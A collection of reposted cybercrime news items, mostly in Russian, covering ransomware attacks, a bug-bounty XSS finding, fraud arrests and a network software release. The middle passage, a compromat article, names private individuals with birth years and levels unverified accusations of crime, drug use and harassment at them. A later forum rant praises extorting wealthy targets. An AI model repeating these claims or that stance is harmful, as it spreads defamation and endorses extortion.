По мнению блогера, российские власти должны инициировать обмен Олейника, поскольку «чем бы он ни занимался, он в первую очередь — наш русский мужик».
«В связи с ненавистью к Даниилу, на Украине не будет никакого справедливого суда. Кроме того, зная данных людей, его жизни тоже будет угрожать опасность. Эти люди не остановятся ни перед чем в погоне за расправой над своим врагом. Тут нет и намека на справедливое правосудие», — согласился Jeka187.
Первые сообщения об аресте WASP Killer появились в мае 2023 года. Тогда стало известно, что он был арестован в Италии по запросу украинских властей. При этом, в окружении россиянина бытовало мнение, что таким образом итальянская полиция защищает его от экстрадиции. После этого Олейник общался со своими сторонниками посредством бумажных писем, которые публиковались в его Telegram- канале. Последний пост в нем вышел 26 июля 2024 года. Официальных подтверждений экстрадиции россиянина на Украину нет.
Участники программы RFJ могут получить до $10 млн за идентификацию или данные о местонахождении APT-группировки.
На конференции Black Hat в Лас-Вегасе участники заметили открытую сеть Wi-Fi
под названием #Rewardsnotransoms. Вход в систему или сканирование QR-кода на
футболках и листовках приводили участников к странице новой инициативы
Государственного департамента США,
предлагающей
до $10 млн за информацию о киберпреступных группировках.
Впервые за почти четыре десятилетия программы Reward for Justice
(«Вознаграждения за справедливость») или RFJ информаторы могут выбрать
получение платежей в криптовалюте и обратиться к правительству США с
конфиденциальной информацией через безопасный портал в даркнете.
По словам представителей госдепа США, изменения призваны усилить национальную
безопасность страны. Цель обновленной программы RFJ заключается в поиске
полезной информации о киберпреступниках, поддерживаемых другими государствами.
Участники программы RFJ могут получить до $10 млн за идентификацию или
определение местонахождения поддерживаемой государством хакерской группировки,
атакующей правительственные системы США и критически важную инфраструктуру.
Доступ к каналу RFJ в даркнете можно получить с помощью браузера Tor. По
словам представителей Госдепа, за несколько недель с момента открытия канала
уже начали поступать сведения о злоумышленниках в киберпространстве.
В результате отправки зараженного электронного письма на тему "Руководство по вакцинации Covid-19", статистика чтения электронной почты составил - 16.7%, а заражения — 5.4%.
Министерство науки и информационных технологий Южной Кореи объявило, что это стало результатом проведения симуляционного обучения реагированию на киберкризис и инциденты для 93,257 сотрудников 285 компаний в течение трех недель с ноября прошлого года.
Статистика чтения и заражения были на 9.1% и 2.2% ниже, чем в первой половине прошлого года. А уровень заражения повторно принявших участие в обучении составил 3.6%, что ниже 8% уровня заражения новых компаний-участников.
Окружной суд Мельбурна приговорил 31-летнего австралийца к двум годам тюремного заключения за кражу личных данных и использование поддельных документов для регистрации криптовалютных аккаунтов.
По данным Федеральной полиции Австралии (AFP), в августе 2022 года правоохранители начали операцию под названием Stonefish. Она была инициирована после того, как власти Великобритании стали расследовать деятельность веб- сайта, предлагающего услуги спуфинга всего за 20 британских фунтов (около $25). Выяснилось, что сайт способствовал краже личных данных и финансовому мошенничеству.
AFP выяснило, что австралиец был связан с этим веб-сайтом. Он открыл счета на двух криптовалютных биржах, используя поддельные документы. Для прохождения процедуры KYC, нарушитель предоставлял чужие водительские права с данными других людей, но с собственной фотографией. Сайт федерального правительства Австралии Report Cyber, посвященный сбору информации о киберпреступлениях, получил жалобу от жителя из Нового Южного Уэльса. Пострадавший сообщил, что кто-то от его имени создал банковский счет. В результате неправомерных действий афериста, общие потери жертв составили 1 млн австралийских долларов ($670 000).
В ноябре 2022 года сотрудники AFP провели обыск в жилище преступника, изъяв у него различные бланки, поддельные водительские права, чей-то потерянный паспорт и другие документы на чужие имена. В компьютере злоумышленника полиция обнаружила зашифрованную платформу обмена сообщениями, где присутствовали инструкции по созданию фальшивых документов. Во время обыска мужчина отказался предоставить коды доступа к своим устройствам.
«Кража личных данных может иметь серьезные последствия для жизни людей, поскольку эта информация продается через Интернет или используется в преступных целях. Это серьезное уголовное преступление, караемое значительным сроком тюремного заключения», — заявил старший инспектор Тим Стейнтони (Tim Stainton).
Между молотом и наковальней: Русская даркнет мафия во время войны
Противники или союзники?
Со дня вторжения экономические отношения между двумя соседними странами сильно обострились, но осталась категория людей, которой удается “усидеть на двух стульях”.
Сегодня мы рассмотрим одну из таких группировок: Raccoons Family и их шефа Евгения Нечаева.
Данная банда на протяжении трех лет совместно активно совершала преступления по всему миру: обналичка, кража персональных данных, подделку документов и иные преступления в сфере цифровых активов, а так же имели колл центры в Киеве, работающие по России.
Проблемные вопросы данная группировка решала жестко - с помощью спецслужб РФ и чеченских силовиков, неоднократно возбуждались уголовные дела и велось силовое преследование членов и глав группы, но им всегда удавалось уходить от ответственности, зачастую отдавая на произвол судьбы своих партнеров и сотрудников.
Но при наличии незаконного бизнеса в чужой стране нужно обеспечивать его безопасность дистанционно - и на этот вопрос есть решение. Нечаев замечен в тесных контактах с СБУ и ДБР - они “крышуют” коллцентры. Такая ли “чужая” эта страна?
Бизнес во время войны
Но главный вопрос в данной ситуации - кого же поддерживает данный коллектив с активами в Украине и РФ? Однозначного ответа нет, ибо их шеф старается сохранять баланс поддержки в обоих государствах.
На фото Евгений и Роман на передаче помощи оккупантам, они лично неоднократно ездили на оккупированные территории за время войны. Помощь же РДК они отправляют в виде криптовалют
Одно из нашумевших дел даркнет
Продолжающийся конфликт между Djunta и коллективом Евгения.
Мы далеко не первые кто пытается добиться правосудия и наказания для этой
группировки.
Их противостояние переросло в нападения, оскорбления, угрозы атак и
преследование со стороны “всех чеченцев мира”.
Ранее в этом году имели место нападения на улицах Москвы: был избит человек, который был ошибочно принят за Djunta и позже был жестоко избит уже сам Djunta. После данной автор канала был вынужден скрываться.
Больше подробностей можно увидеть в детальном разборе конфликта за авторством
канала Djunta.
Евгений считает себя неприкасаемым.
Теперь поговорим о его подчиненных
Примечательно, что все “работники” данной организации - молодые амбициозные
парни смазливой внешности, попавшие в команду после прямого знакомства с
Евгением Геннадьевичем, так же Нечаев частенько организовывал наркотические
корпоративы на своей подмосковной даче, совершенно не думая о своей
безопасности. Молодые мальчики, загородные вечеринки и наркотики, звучит
подозрительно, не так ли?
Изданию удалось выйти на одного из участников данных мероприятий, и он сообщил
нам о факте домогательств со стороны лидера преступной группировки.
Козырной туз
Первый и, пожалуй, самый ценный сотрудник - Чернышев Максим Иванович 2000-го года рождения. Земеля Евгения и его давний партнер по бизнесу, и, потенциально, главный любимчик во всех криминальных делах. Неоднократно уличен в киберпреступлениях, чем сам любит хвастаться, но всегда оставался безнаказанным благодаря сильному покровительству своего шефа. Имеет непосредственное отношение к коллцентрам в Киеве, лично посещал их до начала войны. Также как и Евгений занимает “Нейтральную” позицию по отношению к войне.
Как и остальные члены группировки обожает роскошную жизнь: постоянные поездки на курорты, дорогостоящее арендное жилье в центре Питера и Москвы, огромный гардероб дизайнерских вещей и только дорогие немецкие автомобили.
Так же, как и все остальные члены группировки, злоупотребляет наркотиками и обладает смазливой внешностью, часто присутствовал на корпоративах объединения.
Правая рука:
Охранник Мириамидзе Роман Романович 1991 года рождения. К сожалению, не такая
публичная фигура, но тем не менее постоянно находится с Евгением и
сопровождает его во всех поездках, по совместительству является водителем,
постоянно проживает со своим шефом.
Заключение
На данный момент это вся информация которой обладает наша редакция - мы надеемся на наших читателей в помощи продолжения расследования и содействии в оказании мер по предотвращению деятельности таких неоднозначных объединений в столь такое сложное время. Ниже будут оставлены контакты для анонимного предоставления информации - если вы хотите чем-то поделиться или стали жертвой одного из членов данной компании - просим сообщить. Враги должны быть наказаны.
[ https://compromat-group.com/novosti/item/422175-mezhdu-molotom-i-nakovalney- russkaya-darknet-mafiya-vo-vremya-voyny ](https://compromat- group.com/novosti/item/422175-mezhdu-molotom-i-nakovalney-russkaya-darknet- mafiya-vo-vremya-voyny)
t.me
](https://archive.is/BM4YY)
сохранено 3 авг 2023 10:46:42 UTC
archive.is
](https://web.archive.org/web/20230803104856/https://webcache.googleusercontent.com/search?q=cache:https%3A%2F%2Fcompromat.pro%2Flenta%2Fitem%2F213193-mezhdu- molotom-i-nakovalney-russkaya-darknet-mafiya-vo-vremya-voyny)
Противники или союзники? Со дня вторжения экономические отношения между двумя соседними странами сильно обострились, но осталась категория людей, которой удается “усидеть на двух стульях”. Сегодня мы рассмотрим одну из таких группировок: Raccoons Family и их шефа Евгения Нечаева. Данная...
web.archive.org
Международная хакерская группа Anonymous обратилась к Путину и объявила кибервойну России из-за ее нападения на Украину.
Anonymous собираются опубликовать то, что скрывалось годами и пригрозили, что эта информация станет сокрушительным ударом для Путина и его "коррумпированных муртадов".
Видео обращение
Что думаете по этому поводу?
Сервис Локалбиткоинс закрывается.
График прекращения службы торговли биткойнами:
9 февряля 2023 Приостановление регистрации новых аккаунтов.
16 февряля 2023 Приостановка торгов на LocalBitcoins. Приостановка
использования кошелька LocalBitcoins (за исключением вывода средств)
17 февраля 2023 года клиенты LocalBitcoins смогут войти в систему только для
вывода своих биткойнов. С этого момента услуги торговли и кошелька больше не
будут доступны.
Пруф-линк: https://localbitcoins.com/service_closure/
Так банк показал, что не собирается платить выкуп
После атаки программы-вымогателя Hive Банк Замбии ясно дал понять киберпреступнику, что не собирается платить выкуп, отправив ему фото мужских гениталий.
По заявлению Банка Замбии, недавняя кибератака привела к техническим сбоям систем банка.
«Банк Замбии хочет проинформировать общественность о том, что в понедельник, 9 мая 2022 года, некоторые из приложений в IT-системе банка столкнулись с частичным сбоем. Нарушение затронуло IT-систему обменного пункта и веб-сайт, и произошло из-за предполагаемого киберинцидента. На данный момент системы уже полностью восстановлены», - заявлено в пресс-релизе банка.
Атака была проведена с помощью программы-вымогателя Hive. Субъект угрозы заявил, что зашифровал сетевое хранилище (Network Attached Storage, NAS) банка. Вместо оплаты выкупа представитель банка высмеял никнейм злоумышленника «14m3-sk1llz» и отправил ему изображение мужского члена.
«О****и этот член и перестань блокировать банковские сети, думая, что ты зарабатываешь, научись зарабатывать», - добавил банк к отправленному изображению.
По предположениям экспертов, чат мог быть захвачен незнакомыми друг другу взломщиками. Исследователь безопасности MalwareHunterTeam опубликовал опрос и спросил мнение людей о ситуации. Большинство респондентов сказали, что сообщение действительно отправил банк.
«Если на странице банка или в чате жертвы вымогателя появляется изображение
члена, это означает, что:
А: кто-то получил доступ к чату.
Б: жертва не планирует платить выкуп и поэтому отправляет «доброе» сообщение
киберпреступнику.», - написал исследователь MalwareHunterTeam.
По словам технического директора банка Грега Нсофу, основные системы банка под защитой и нет необходимости взаимодействовать со злоумышленником.
«Итак, мы ясно указали киберпреступнику, куда ему идти», - добавил Нсофу и
подтвердил, что изображение отправил представитель банка.
Программы-вымогатели остаются серьезной проблемой для пользователей и для
уменьшения угрозы нужно просто не платить выкуп и восстанавливать данные из
резервной копии. Неуплата выкупа, усиленные действия правоохранительных
органов и санкции со стороны правительства увеличивают шанс исчезновения
программ-вымогателей.
source: translate.google.com/website?sl=en&tl=ru&hl=en&client=webapp&u=https://www.boz.zm/Disruption_IT_Services.pdf
Киберполицейские прекратили деятельность мошеннических центров в трех областях Украины — во Львове, Одессе, Днепре и Кривом Роге.
Об этом сообщает Киберполиция на официальном сайте.
Полицейские установили, что всего в call-центрах работало более 800 человек. Заранее разрабатывались сценарии общения с клиентами, операторов обучали применять манипулятивные техники, направленные на вызов доверия.
Злоумышленники оборудовали офисы электронно-вычислительной техникой и Sip- телефонией.
Аферисты звонили по телефону гражданам под видом работников службы безопасности банков и мобильных операторов.
Правонарушители узнавали реквизиты карт и коды из SMS-сообщений для дальнейшего присвоения денег. Также гражданам предлагали инвестировать средства в криптовалюту. Или заинтересовывали пострадавших сверхвысокими доходами от инвестиций в разных сферах экономики. Устанавливается сумма нанесенного ущерба.
По местам расположения call-центров правоохранители провели 17 обысков.
Извлечено около 900 единиц компьютерной техники, а также мобильные телефоны, жесткие диски, SIM-карты и документацию.
Проводятся следственные действия для установления организаторов мошеннических схем.
Открыты четыре уголовных производства по частям 2, 3, 4 статьи 190 (Мошенничество) Уголовного кодекса Украины.
source: cyberpolice.gov.ua/news/kiberpoliczejski-prypynyly-diyalnist- shaxrajskyx-sall-czentriv-u-trox-oblastyax-ukrayiny-3573
Индийский багхантер и пентестер Вишал Бхарад (Vishal Bharad) рассказал в блоге о том, как обнаружил хранимую XSS на сайте iCloud.com.
Изначально исследователь искал на сайте уязвимости, связанные с CSRF (Cross- Site Request Forgery), IDOR (Insecure Direct Object Reference), логические ошибки и так далее, но в итоге случайно обнаружил XSS.
Уязвимость присутствовала в Apple Pages и Keynote, размещенных в iCloud. Эксплуатация бага подразумевала создание нового документа или презентации и внедрение полезной XSS-нагрузки в поле имени.
По сути, для эксплуатации проблемы злоумышленнику нужно было поделиться ссылкой на такой вредоносный документ или презентацию со своей жертвой, а затем убедить ее войти в настройки и воспользоваться функцией Browse All Versions. Как только жертва нажимала на Browse All Versions, вредоносная нагрузка злоумышленника запускалась в ее браузере. Ниже пример такой атаки можно увидеть воочию.
Бхарад рассказывает, что обнаружил проблему еще в августе 2020 года, о чем сразу сообщил в Apple. Уязвимость исправили лишь осенью, и в октябре 2020 года эксперт узнал, что за обнаружение этого бага ему выплатили 5000 долларов США.
Источник: xakep.ru/2021/02/20/icloud-xss/
В Госдуме обяжут получить специальную лицензию для тех, кто продает курсы и тренинги.
По данным за 2023 год, выручка балаболов онлайн школ составила около 50 млрд рублей.
Власти решили плотно взяться за контроль всех инфоцыганей в России, а соответствующий законопроект уже внесён на рассмотрение.
Теперь, чтобы дышать маткой, нужно образование.
Researchers detail two new types of ransomware - AlumniLocker and Humble. Both
are new and have very different ways of doing things, demonstrating the
diversity in a space attackers are keep to get involved in.
Two newly discovered forms of ransomware with very different traits show just
how diverse the world of ransomware has become as more cyber criminals attempt
to join in with cyber extortion.
Both forms of [ransomware](https://www.zdnet.com/article/ransomware-an- executive-guide-to-one-of-the-biggest-menaces-on-the-web/) emerged in February and have been [detailed by cybersecurity researchers at Trend Micro](https://www.trendmicro.com/en_us/research/21/c/new-in-ransomware- alumnilocker-humble-feature-different-extortio.html) –AlumniLocker and Humble
AlumniLocker is a variant of [Thanos ransomware](https://www.zdnet.com/article/this-new-ransomware-is-targeting- windows-and-linux-pcs-with-a-unique-attack/) and immediately stands out for [demanding a payment ](https://www.zdnet.com/article/how-bitcoin-helped-fuel- an-explosion-in-ransomware-attacks/)of 10 Bitcoins from the infected victim – a figure currently equivalent to around $450,000.
The ransomware is delivered to victims via a malicious PDF attachment claiming to be an invoice which is distributed in [phishing emails](https://www.zdnet.com/article/what-is-phishing-how-to-protect- yourself-from-scam-emails-and-more/). The PDF contains a link which will extract a ZIP archive which runs a PowerShell script to drop the payload and execute the ransomware.
Like an increasing number of ransomware campaigns, the attackers behind AlumniLocker [threaten to publish data stolen from the network of their victim](https://www.zdnet.com/article/ransomware-warning-now-attacks-are- stealing-data-as-well-as-encrypting-it/) if they're not paid within 48 hours – although given the ransom demand is so large, victims may decide it's too much to pay.
The ambitious ransom demand and other inconsistencies in their attack techniques – including how the data leak site doesn't actually work - could indicate that those behind AlumniLocker are probably just starting out.
"It does seem like this might be a new group that does not have experience in successfully ransoming their victims as the ransom demand is much higher than typical. Being that the leak site doesn't work is another example of showing their hand of being newbies. " Jon Clay, director of global threat communications at Trend Micro told ZDNet.
Humble ransomware also first appeared during February, but is very different in a number of ways. Firstly, the ransomware is much smaller, demanding just 0.0002 Bitcoins – currently just under $10 – for the return of files, indicating that Humble might be targeting individuals rather than organisations.
It's still unknown how exactly Humble is distributed, but researchers note that it's likely to be via phishing attacks.
SEE:[A winning strategy for cybersecurity](http://www.zdnet.com/topic/a-winning-strategy-for- cybersecurity/)(ZDNet special report) |[Download the report as a PDF](https://www.techrepublic.com/resource-library/whitepapers/a-winning- strategy-for-cybersecurity-free- pdf/?ftag=CMG-01-10aaa1b)(TechRepublic)
In an effort to push victims towards paying the ransom, Humble threatens the victim by stating that if they restart their system, the Master Boot Record (MBR) will be rewritten, rendering the machine unusable. A second version of Humble carries the same threat, but instead says this will happen if the victim doesn't pay after five days.
Humble is unusual for ransomware in being compiled with an executable wrapper (Bat2Exe) in batch file. What's also strange is that it uses Discord – a voice, text and video communications service popular among gamers – to send reports back to its author.
Both forms of new ransomware are unusual, but both demonstrate that ransomware continues to be appealing to cyber criminals who see how the top gangs are making so much money, and want to do the same.
Organisations can help protect themselves from ransomware attacks with cybersecurity procedures including [applying patches](https://www.zdnet.com/article/cybersecurity-how-to-get-your-software- patching-strategy-right-and-keep-the-hackers-at-bay/) and using [multi-factor authentication](https://www.zdnet.com/article/better-than-the-best-password- how-to-use-2fa-to-improve-your-security/).
Национальная служба здравоохранения Ирландии, Health Service Executive (HSE), временно отключила свои ИТ-системы из-за атаки шифровальщика Conti (он же Ryuk). Хотя атака не повлияла на оказание неотложной медицинской помощи, сообщается, что некоторые плановые осмотры и процедуры все же могли быть отложены или отменены, так как сотрудники медучреждений лишились доступа к онлайн-системам, электронным картам пациентов и прочим медицинским записям.
Глава HSE Пол Рид сообщил прессе, что в настоящее время специалисты расследуют случившееся и пытаются опередить масштабы инцидента. В другом интервью Рид подтвердил, что ответственность на эту атаки лежит именно на операторах малвари Conti.
В распоряжении редакции издания Bleeping Computer оказались скриншоты переговоров между хакерами и представителями HSE. Злоумышленники заявили, что находились в сети HSE более двух недель и похитили 700 Гб файлов, включая конфиденциальную информацию о пациентах и сотрудниках, контракты, финансовые отчеты, платежные ведомости и многое другое. В чате злоумышленники поделились образцами украденных документов, однако этих доказательств журналисты не видели. Хакеры пишут, что предоставят HSE дешифровщик и удалят все украденные данные, если им выплатят выкуп в размере 19 999 000 долларов.
[](https://xakep.ru/wp- content/uploads/2021/05/348880/conti-ransom-demand.jpg)
В конце прошлой недели премьер-министр Ирландии Михол Мартин официально заявил, что платить выкуп злоумышленникам не будут.
Верховный суд России разрешил считать конвертацию криптовалюты в рубли
отмыванием средств
Верховный суд согласился с прокуратурой и признал, что перевод биткоинов с
виртуального счета на банковские счета с конвертацией в рубли может считаться
легализацией преступных доходов
Верховный суд России пересмотрел приговор суда первой инстанции в отношении фигуранта, которого признали виновным в незаконном обороте наркотиков, но оправдали по делу о легализации биткоинов, сообщает РАПСИ со ссылкой на материалы дела.
Фигурант (его имя не называется) хранил прекурсоры наркотических средств, а также производил мефедрон; покупатели оплачивали товар криптовалютой, которую он затем конвертировал в рубли и переводил на счета и карты дочери своей сожительницы. Суд первой инстанции пришел к выводу, что преобразование биткоинов в рубли и их перевод с виртуального счета на банковские карты без введения их в экономический оборот не является легализацией доходов, полученных преступным путем.
С этим решением не согласилась прокуратура, которая обратилась в Верховный суд. В ведомстве заявили, что фигурант целенаправленно переводил деньги с виртуального счета на банковские карты, «придавая правомерный вид их владению», и вывел в легальный оборот более 8 млн руб. При этом он пользовался технологиями, которые позволили избежать банковского контроля и исключить возможность установить собственников счетов.
источник : https://www.rbc.ru/finances/28/06/2023/649be2499a79470e397347c6
Специальный киберпатруль поддерживает правопорядок с мышкой наперевес, за время работы сотрудники получили свыше 5 тысяч наводок от онлайн-сообщества.
В штаб-квартире датской полиции, г. Денмарк, офицеры не отрываются от своих компьютеров в поисках опасных преступников. Однако продвинутые полицейские ищут злодеев не в базах данных или социальных сетях, для этого они часами играют в Counter-Strike и другие игры. Как же устроена эта весьма необычная система поимки преступников?
Полицейский отряд специального назначения, насчитывающий десять квалифицированных сотрудников, был создан ещё в прошлом году на фоне роста онлайн-преступности во время пандемии COVID и локдаунов. Стражи порядка работают открыто, их ники прямо сообщают другим игрокам о том, что они из полиции. Хотя иногда офицеры и могут поработать под прикрытием.
Киберпатруль также присутствует на Twitch, Discord, Instagram *, Facebook * и TikTok с целью сделать интернет безопаснее как для детей, так и для взрослых. Основными целями отряда являются финансовые мошенники и сексуальные маньяки, но подобными личностями, разумеется, дело не ограничивается.
«Так же, как вы видите полицейскую машину, патрулирующую улицы, теперь вы можете видеть полицейских в киберпространстве», — объясняет Сиссе Биркебек, руководитель патруля.
Киберполицейские патрулируют Valorant
Мириам Михаэльсен, датский юрист и основательница ассоциации «Цифровая ответственность», давно призывала полицию контролировать интернет. «Когда вы видите проезжающую машину полиции, это может оказать влияние как на жертв, так и на преступников... то же самое в интернете», — заявляет Михаэльсен.
С момента своего создания в апреле 2022 года полицейский онлайн-патруль завёл уже более 65 дел. «Мы видим много случаев злоупотребления и попыток домогательства к подросткам. Много попыток выманить у них деньги, много случаев мошенничества в игровом сообществе», — говорит Биркебек.
Как сообщается, сотрудники кибер-отряда играют в CS:GO, Valorant, Fortnite и FIFA. Они используют ники «Офицер 1», «Офицер 2» и т.д. Правоохранители играют, наблюдают и заводят контакты, так же, как если бы они были на обычном патрулировании на улице. Впрочем, работой на улице они тоже не обделены. Чаще всего сотрудники патруля работают неодновременно, а по 2-3 человека, периодически подменяя друг друга.
На Twitch мы прямо говорим: «Привет, мы офицеры полиции. Мы играем и нам нужны добровольцы из чата. Вы можете прийти и поиграть с нами», — рассказал 36-летний офицер Ример Торуп.
На данный момент у полицейских 127 тысяч подписчиков на TikTok, 23 тысячи на Twitch, 10 тысяч на Facebook и 6 тысяч в Instagram. Подразумевается, что любой игрок, попавший в беду, может лично переговорить с киберофицерами, попросив у них помощи.
С тех пор, как отдел был запущен, полицейские получили более 5 200 наводок от онлайн-сообщества. В свободное время Ример Торуп руководит клубом киберспорта для подростков на базе полицейской станции в Копенгагене. Многие дети приходят из неблагополучных районов и также могут сообщить офицерам о чём-то неладном.
«Я не думаю, что мы можем решить все проблемы с цифровым насилием, имея подобный онлайн-патруль. Но если мы увидим, что хотя бы 10, 15, 20 человек получат помощь таким образом, которую они не решились бы попросить иначе, это имеет определённое значение», заявила Мириам Михаэльсен.
Бюджеты на финансирование киберпатруля пока что согласуются и обсуждаются ежегодно, однако офицеры надеются, что подобная онлайн-активность станет для них постоянной. Все члены цифрового отряда в позитивном ключе высказываются о такой работе. По их словам, быть первооткрывателями в чём-то — крайне захватывающе. Да и само патрулирование в видеоиграх — занятие совсем не пыльное, весёлое и интересное.
А вы бы хотели служить в подобном онлайн-отряде и бороться с киберпреступниками и прочими онлайн-злодеями?

](https://www.vice.com/en/article/n7nw8m/conti-ransomware-hackers-apologize- to-arab-royal-families-for-leaking-their-data)
“Bluntly, UAE sends assassination teams to deal with people they don’t like. [...] Even ransomware groups are subject to political pressure."
 www.vice.com
Conti proved that they are just bullies and cowards, who like to act as hardliners and most cutthroat gang when it is about attacking those who are weak, being the only ones who are 'having balls' to lock hospital networks, but when it comes to attacking real targets they act as snitch bootlickers they are and even apologize publicly.
Real thief will never step back and apologize to rich old royal bastards. Same
bilionaire bastards who are enslaving so much people and financing radical
islam. Real thief would ripp of from them everything he can. Would blackmail
them, make their life hell, strip them off of their bloody billions.
Pink Panthers, greatest thief group in entire world, they had the balls to go
and rob 14 million in center of Dubai,
They were not stealing or recketeering hospitals
It really makes me sad that hackers who do have a skill to make serious damage
to the power and to steal milions don't have courage to do that.
And it makes me even more sad that I who do have courage am lacking skills to
do it.
To finish with message for CONTI
Ж В С С
Главным следственным управлением ГУ МВД России по Челябинской области окончено расследование уголовного дела, возбужденного по обстоятельствам преступлений, предусмотренных частью 3 статьи 30, пунктом «г» части 3 статьи 158, пунктом «а» части 4 статьи 158 Уголовного кодекса Российской Федерации «Кража». В совершении противоправных деяний обвиняется 30-летний житель Свердловской области.
По данным следствия, обладающий достаточным уровнем знаний в области информационных технологий мужчина организовал группу, в которую вошли еще трое мужчин 1992, 1994 и 1996 годов рождения, также имеющих познания в сфере IT- технологий, с целью похищения денег со счетов граждан. В распоряжении злоумышленников оказалась незаконная база данных банковских карт со сведениями об их владельцах, кодах безопасности и сроках действия. Она была добыта нелегальным путем с помощью так называемых фишинговых сайтов – копий оригинальных сайтов авиакомпаний, банковских и микрофинансовых организаций, платежных систем, страниц авторизации и оплаты интернет-магазинов. Посещая поддельные интернет-ресурсы и оставляя на них свою персональную информацию, в том числе сведения о банковских картах, граждане делают их доступными для злоумышленников.
Участники организованной группы, используя незаконную базу данных, приобретали в сети Интернет товары и услуги, расплачиваясь денежными средствами ничего не подозревающих владельцев пластиковых карт. В случаях, когда для оплаты нужно было ввести числовую комбинацию, направленную банком на телефонный номер держателя карты, злоумышленники звонили абоненту и, представлялись сотрудниками службы безопасности финансово-кредитной организации, под различными предлогами вынуждали сообщать им код подтверждения финансовой операции. После этого происходило списание денежных средств в счет оплаты приобретенного товара. Суммы хищения составляли от одной до шестидесяти пяти тысяч рублей.
В июле 2020 года противоправная деятельность организованной группы пресечена оперативниками уголовного розыска ГУ МВД России по Челябинской области и УМВД России по г. Магнитогорску. С целью задержания злоумышленников южноуральские полицейские выезжали в служебную командировку в Свердловскую область.
Согласно материалам уголовного дела, жертвами преступлений стали 38 человек, проживающих в Челябинске, Владивостоке, Мурманске, Москве и Липецке. Общий причиненный ущерб составил около 700 тысяч рублей, который в ходе предварительного следствия возмещен потерпевшим в полном объеме. На денежные средства в сумме более 400 тысяч рублей, изъятые у организатора группы, по ходатайству следователя наложен арест.
По уголовному делу назначено и осуществлено более 17 компьютерных, фоноскопических, технико-криминалистических экспертиз, проведены обыски, в ходе которых изъято более 500 сим-карт и более 500 банковских карт, мобильные телефоны, оргтехника.
Лидеру организованной группы предъявлено обвинение в совершении 38 преступных эпизодов. За данные противоправные деяния законодательством предусмотрено наказание в виде лишения свободы на срок до 10 лет. На период расследования ему избиралась мера пресечения в виде домашнего ареста, остальные участники находились под подпиской о невыезде и надлежащем поведении.
Материалы уголовного дела вместе с обвинительным заключением в отношении организатора направлены в Курчатовский районный суд г. Челябинска для рассмотрения по существу. Расследование уголовного дела в отношении остальных участников продолжается.
Following Microsoft's release of out-of-band patches to address multiple zero- day flaws in on-premises versions of Microsoft Exchange Server, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive warning of "active exploitation" of the vulnerabilities.
The alert comes on the heels of Microsoft's [disclosure](https://thehackernews.com/2021/03/urgent-4-actively- exploited-0-day-flaws.html) that China-based hackers were exploiting unknown software bugs in Exchange server to steal sensitive data from select targets, marking the [second time in four months](https://thehackernews.com/2020/12/us- agencies-and-fireeye-were-hacked.html) that the U.S. has scrambled to address a widespread hacking campaign believed to be the work of foreign threat actors.
While the company mainly attributed the campaign to a threat group called HAFNIUM, Slovakian cybersecurity firm ESET said it found evidence of CVE-2021-26855 being actively exploited in the wild by several cyber espionage groups, including LuckyMouse, Tick, and Calypso targeting servers located in the U.S., Europe, Asia, and the Middle East.
Researchers at Huntress Labs have also sounded the alarm about mass
exploitation of Exchange servers, noting that over 350 web shells have been
discovered across approximately 2,000 vulnerable servers.
"Among the vulnerable servers, we also found over 350 web shells — some targets may have more than one web shell, potentially indicating automated deployment or multiple uncoordinated actors," Huntress senior security researcher John Hammond [said](https://www.huntress.com/blog/rapid-response- mass-exploitation-of-on-prem-exchange-servers). "These endpoints do have antivirus or EDR solutions installed, but this has seemingly slipped past a majority of preventative security products."
The latest development indicates a much larger spread that extends beyond the "limited and targeted" attack reported by Microsoft earlier this week.
It's not clear if any U.S. government agencies have been breached in the campaign, but the CISA directive underscores the urgency of the threat.
Strongly urging organizations to apply the patches as soon as possible, the agency cited the "likelihood of widespread exploitation of the vulnerabilities after public disclosure and the risk that federal government services to the American public could be degraded."
[Опубликован](https://github.com/yggdrasil-network/yggdrasil- go/releases/tag/v0.4.0) выпуск эталонной реализации протокола Yggdrasil 0.4, позволяющего поверх обычной глобальной сети развернуть отдельную децентрализованную приватную IPv6-сеть, для защиты конфиденциальности в которой применяется сквозное шифрование. Для работы через сеть Yggdrasil могут использоваться любые существующие приложения, поддерживающие IPv6. Реализация написана на языке Go и распространяется под лицензией LGPLv3. Поддерживаются платформы Linux, Windows, macOS, FreeBSD, OpenBSD и Ubiquiti EdgeRouter.
Yggdrasil развивает новую концепцию маршрутизации для создания глобальной децентрализованной сети, узлы в которой могут соединяться как напрямую между собой в режиме mesh-сети (например, через Wi-Fi или Bluetooth), так и взаимодействовать поверх существующих IPv6 или IPv4 сетей (сеть поверх сети). Отличительной особенностью Yggdrasil является самоорганизация работы, без необходимости явной настройки маршрутизации - информация о маршрутах рассчитывается, отталкиваясь от расположения узла в сети относительно других узлов. Устройства адресуются через обычный адрес IPv6, который не меняется в случае перемещения узла (в Yggdrasil задействован неиспользуемый диапазон адресов 0200::/7).
Вся сеть Yggdrasil рассматривается не как объединение разрозненный подсетей, а как единое структурированное остовное дерево, у которого имеется один "корень", а каждый узел имеет одного родителя, а также одного или нескольких потомков. Подобная древовидная структура позволяет построить маршрут к узлу назначения, относительно узла источника, используя механизм "locator", определяющий оптимальный путь к узлу от корня.
Информация о дереве распределяется между узлами и не хранится централизованно. Для обмена данными о маршрутизации применяется распределённая хэш-таблица (DHT), при помощи которой узел может извлечь всю информацию о маршруте к другому узлу. Сама по себе сеть обеспечивает лишь сквозное шифрование (транзитные узлы не могут определить содержимое), но не анонимность (при подключении через интернет, одноранговые узлы, с которыми осуществляется прямое взаимодействие, могут определить реальный IP-адрес, поэтому для анонимности предлагается подключать узлы через Tor или I2P).
Отмечается, что несмотря на нахождение проекта на стадии альфа-разработки, он уже достаточно стабилен для ежедневного использования, но не гарантирует обратную совместимость между выпусками. Для Yggdrasil 0.4 сообществом поддерживается набор сервисов, включая платформу для размещения Linux- контейнеров для хостинга своих сайтов, поисковую систему YaCy, коммуникационный сервер Matrix, IRC-сервер, DNS, систему VoIP, BitTorrent- трекер карту точек подключения, шлюз в IPFS и прокси для обращения к сетям Tor, I2P и clearnet.
В новой версии:
• Реализована новая схема маршрутизации, не совместимая с прошлыми выпусками Yggdrasil.
• При установке TLS-соединений с узлами задействована привязка открытых ключей (key pinning). Если привязка при соединении отсутствовала, полученный ключ будет закреплён за соединением. Если привязка была установлена, но ключ ей не соответствует, соединение будет отвергнуто. TLS с привязкой ключей определён как рекомендованный метод подключения к пирам.
